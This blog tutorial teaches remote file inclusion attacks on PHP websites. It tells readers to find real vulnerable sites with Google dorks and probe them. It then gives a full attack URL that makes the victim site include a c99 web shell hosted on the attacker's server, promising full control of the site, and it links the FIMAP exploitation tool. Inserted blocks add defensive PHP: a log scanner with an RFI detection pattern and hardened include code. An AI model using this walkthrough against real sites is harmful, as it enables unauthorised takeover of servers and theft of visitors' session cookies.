WEBSITE HACKING: REMOTE FILE INCLUSION
REMOTE FILE INCLUSION (RFI)
Remote file inclusion (RFI) is a very common vulnerability found in most websites. Remote file inclusion allows the attacker to upload a script or malicious code to a website or server. Using this attack, we can exploit "dynamic file include" mechanisms in web applications. When a web application takes user input (such as a URL or parameter values) and passes it into file include commands, the website can be tricked into including remote files with malicious code. Using RFI you can deface vulnerable websites, get access to the server, or even manipulate the response sent to the clients of the website. For example, you can embed JavaScript code to steal the client's session cookie.
PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming. The vulnerability mainly relies on the PHP include() function, so you need to know some basic PHP concepts to understand this attack. The include() function is used to include and evaluate a specified file. The PHP code responsible for this vulnerability will be in a format similar to that stated below:
Thus, if this isn't coded properly, the script doesn't check where the file is coming from, and so an inclusion from another site will be accepted and run on the server. This means that a text file containing PHP script can be hosted on another site but run on the site being targeted.
Performing an RFI attack
1. The first step is to find a vulnerable website
Remote file inclusion vulnerabilities usually occur in sites which have navigation similar to this:
www.victimwebsite.com/index.php?page=something
To find a vulnerable website, we will use Google dorks:
Go to Google and type the following:
Inurl:index.php?file=something
Or
Inurl:index.php?page=something
Or
Inurl:index.php?open=something
There are many more dorks for finding RFI-vulnerable websites.
At the end you will find numerous websites similar to the address stated above. But remember, these are sites which may be prone to an RFI attack. We have to check further whether they are vulnerable or not.
So go to a particular website on which you want to test the RFI attack. For example, if your website's URL is: www.victimwebsite.com/index.php?file=anything
Replace the red colour text (the parameter value, here "anything") with http://google.com, so that the URL of the target website becomes: www.victimwebsite.com/index.php?file=http://google.com
Now, as soon as you press Enter, if the Google homepage appears inside the website, it means the website is vulnerable to an RFI attack.
EXPLOITING RFI VULNERABILITY
2. Now let's look at how we can exploit the RFI vulnerability.
This is where the concept of web shells comes in. A web shell is a script that can handle simple tasks such as uploading, deleting and executing commands. The most common shell is the c99, but others are available, such as the r57 and c100. This basically means that if you get a web shell to execute on an unprotected site, you will have full control over that site - and will be able to upload or delete any file you wish.
We will use the c99 web shell to deploy our attack. You can download the c99 web shell from the link below:
Now you need to upload this web shell as a text file to your own website (the attacker's website) or to any web host. After uploading, if your URL is www.mysite.com/c99.txt, then all you do is simply put this link at the end of your vulnerable site's URL. Thus the final string that will run the web shell is:
http://www.victimwebsite.com/index.php?file=http://www.mysite.com/c99.txt?
Note: the question mark should be at the end.
This will execute in PHP as
include('http://www.mysite.com/c99.txt'); which includes the web shell's script in the page.
Now if you succeed in running the web shell on the vulnerable website, you will see a screen similar to the one below:
The shell will display information about the remote server and list all the files and directories on it. Now you are inside the website and you can do anything with it.
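Seen from the server side, the requests described above stand out in the access log because a query parameter carries a full URL. The following is an added example, not code from the original post, that scans log lines for that pattern; the log lines are constructed samples, and the function name and scheme list are assumptions.

```php
<?php
// Added example: flag access-log requests whose query parameters carry a
// remote URL or PHP stream wrapper, the request shape of an RFI attempt.
// The scheme list and function name are assumptions for illustration.

const SUSPECT_SCHEMES = '~^\s*(?:https?|ftps?|php|data|expect):~i';

// Return the names of query parameters whose decoded value starts with a
// scheme from the list above.
function suspectParams(string $requestTarget): array
{
    $pos = strpos($requestTarget, '?');
    if ($pos === false) {
        return [];
    }
    // parse_str() URL-decodes names and values once.
    parse_str(substr($requestTarget, $pos + 1), $params);
    $hits = [];
    array_walk_recursive($params, function ($value, $key) use (&$hits) {
        // Decode once more so double-encoded values are also caught.
        if (preg_match(SUSPECT_SCHEMES, rawurldecode((string) $value))) {
            $hits[] = (string) $key;
        }
    });
    return $hits;
}

// Constructed sample lines (common log format, documentation addresses).
$lines = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=contact HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?file=http://example.org/a.txt? HTTP/1.1" 200 9001',
    '203.0.113.9 - - [10/Oct/2023:13:56:04 +0000] "GET /index.php?open=hTTp%3A%2F%2Fexample.org%2Fa.txt HTTP/1.1" 200 87',
];

foreach ($lines as $line) {
    // Pull the request target out of the quoted request line.
    if (!preg_match('~"[A-Z]+ (\S+) HTTP/[\d.]+"~', $line, $m)) {
        continue;
    }
    $hits = suspectParams($m[1]);
    if ($hits !== []) {
        printf("possible RFI attempt, param(s) %s: %s\n", implode(',', $hits), $m[1]);
    }
}
```

Parameters that legitimately carry URLs, such as redirect targets, will also match, so hits need to be reviewed against what each parameter is meant to hold.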
PROTECTION AGAINST RFI
If you still want to use index.php?file=, then use a "switch" statement that defines the pages beforehand. Secure PHP code would be as below:
Or the best way is simply to make sure that you are using up-to-date scripts, and that your server's php.ini file has register_globals and allow_url_fopen disabled.
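The protection described above, as an added example that is not the original author's code: the vulnerable pattern is shown in a comment beside a hardened form that uses a fixed lookup table in place of the "switch" statement (same effect, one entry per allowed page). The page names, file paths and the resolvePage() helper are assumptions.

```php
<?php
// Added example (not the original author's code). Page names, paths and
// the resolvePage() helper are hypothetical.

// Vulnerable pattern the article describes: user input reaches include()
// unchecked, so a URL in ?file= is fetched and executed when URL includes
// are enabled.
//     include($_GET['file']);

// Hardened form: the request value is only ever used as a key into a fixed
// map, so the path passed to include is always one of these constants.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolvePage($requested): ?string
{
    // Arrays (?file[]=x) and other non-strings are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return PAGES[$requested];
}

// Defence in depth: refuse to serve at all if the runtime would allow
// include() to fetch URLs.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('Misconfiguration: allow_url_include is enabled.');
}

$path = resolvePage($_GET['file'] ?? 'home');
if ($path === null) {
    http_response_code(404);
    exit('Page not found.');
}
include $path;
```

allow_url_include is the php.ini directive that governs URL includes specifically; it only takes effect when allow_url_fopen is on, so disabling either one blocks remote includes.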
I personally don’t prefer any tool for penetration testing, but if you want to use a tool for RFI attacks, a tool called FIMAP is used to exploit remote file inclusion. It is scripted in the Python language.
Read more:
http://code.google.com/p/fimap/
Download the tool:
http://code.google.com/p/fimap/downloads/list
Sources: security papers from: www.exploit-db.com
http://en.wikipedia.org/wiki/Remote_file_inclusion
image source: www.hackforums.net
Well, that’s the end of the tutorial. Hope you have learnt something from this post. Your feedback will be useful for us.
!!!!ENJOY HACKING!!!
Posted by: DR34MHAXX
3 comments:
But c99 and other shells are viruses... they can harm your system...